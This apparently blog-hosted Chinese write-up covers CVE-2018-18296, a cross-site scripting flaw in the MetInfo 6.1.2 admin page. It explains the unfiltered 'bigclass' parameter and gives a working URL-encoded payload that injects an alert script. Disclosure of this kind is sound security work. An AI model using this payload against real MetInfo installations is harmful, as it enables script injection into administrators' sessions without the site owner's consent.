(CVE-2018-18296)Metinfo 6.1.2版本 XSS漏洞

漏洞概述

漏洞存在于MetInfo6.1.2/admin/index.php页面,由于参数bigclass过滤不严,导致XSS漏洞

具体情况

首先登录网站后台:http://ip/MetInfo6.1.2/admin/,登录成功后,构造payload:
http://ip/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e ,即可执行跨站脚本。

POC实现代码如下:

XSS漏洞的 exp代码如下:

http://127.0.0.1/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e

附:CVE-2018-18296官方地址

上一篇:鸿蒙轻内核 M 核源码分析:数据结构之任务排序链表


下一篇:双向循环链表:鸿蒙轻内核中数据的“驿站”